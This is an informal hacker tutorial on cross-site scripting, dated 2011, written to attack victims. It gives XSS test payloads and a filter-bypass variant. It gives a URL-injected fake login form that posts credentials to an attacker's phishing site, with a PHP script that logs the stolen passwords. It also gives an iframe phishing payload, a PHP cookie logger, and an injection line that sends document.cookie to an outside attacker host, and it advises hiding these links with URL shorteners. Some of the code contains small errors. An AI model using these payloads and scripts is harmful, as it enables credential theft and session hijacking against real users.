F: XSS by LiTeRs50

Hey today we're going to talk about XSS(cross site scripting)
We are talking about common xss attack types:
Injectable by URL -client side
Injectable by field forms -client side

It depends if we can execute PHP or HTML, if we can inject PHP then we can also
inject HTML but NOT vice versa)

To find a XSS vulnerability the automatic way you can use:
https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework

To test it out manual you like:
<script>alert"xss"</script>

That will pop-up a window shouting xss on client site(just your browser)
For bypassing ids,ips you can encode it in hex etc.
Or do things like:
'> <*script>alert("xss")<*/script>

But this manual shit is boring so lets talk about some more interesting things.
XSS PHISHING :DD

All we do is grab a vuln popular url and add xss script to it, send it to victim as embedded link
Like this
 www.site.com/google.php?search=<html><body><head><meta content="text/html; charset=utf-8"></meta></head>
  <div style="text-align: center;"><form Method="POST" Action="http://www.phishingsite.com/phishingscript.php">
  Phishingpage :<br /><br/>Username :<br /> <input name="User" /><br />Password :<br />
  <input name="Password" type="password" /><br /><br /><input name="Valid" value="Ok !" type="submit" />
  <br /></form></div></body></html>

you haft to own the "http://www.phishingsite.com/phishingscript.php" ofc

content of phishingscript.php

<?php
$login = $_POST['user'];
$password = $_POST['Password'];
$open = fopen('log.txt', 'a+');
fputs($open, 'Username : ' . $login . '<br >' . '
Password : ' . $password . '<br >' . '<br >');
?>


or maybe Iframe phishing be like:
www.site.com/google.php?search=<iframe src="http://www.yourphishingsite.com" height="100%" width="100%"></iframe>


Enough with phishing, lets now talk about
Cookie hijacking:
Put  cookie logger script on your webpage and insert it to javascript into xss vulnerable with the cookielogger script address :)
The rest will script handle

cookielogger.php
	 <*?php

function GetIP()
{
if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
$ip = getenv("HTTP_CLIENT_IP");
else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
$ip = getenv("HTTP_X_FORWARDED_FOR");
else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
$ip = getenv("REMOTE_ADDR");
else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
$ip = $_SERVER['REMOTE_ADDR'];
else
$ip = "unknown";
return($ip);
}

function logData()
{
$ipLog="log.txt";
$cookie = $_SERVER['QUERY_STRING'];
$register_globals = (bool) ini_get('register_gobals');
if ($register_globals) $ip = getenv('REMOTE_ADDR');
else $ip = GetIP();

$rem_port = $_SERVER['REMOTE_PORT'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$rqst_method = $_SERVER['METHOD'];
$rem_host = $_SERVER['REMOTE_HOST'];
$referer = $_SERVER['HTTP_REFERER'];
$date=date ("l dS of F Y h:i:s A");
$log=fopen("$ipLog", "a+");

if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie
");
else
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n");
fclose($log);
}

logData();

?>


Make a tlog.txt and put both of them on your webspace and set "chmod 777".
Inject the following code in your target website:
http://www.site.com/google.php?search=<script>location.href = 'http://phishingsite.com/cookiestealer.php?cookie='+document.cookie;</script>
you vuln script be like ofc <script>location.href = 'http://phishingsite.com/cookiestealer.php?cookie='+document.cookie;</script>


use url shortener services such as tinyurl.com or bit.ly to 'hide' your injection script from the victim


information and code from 2011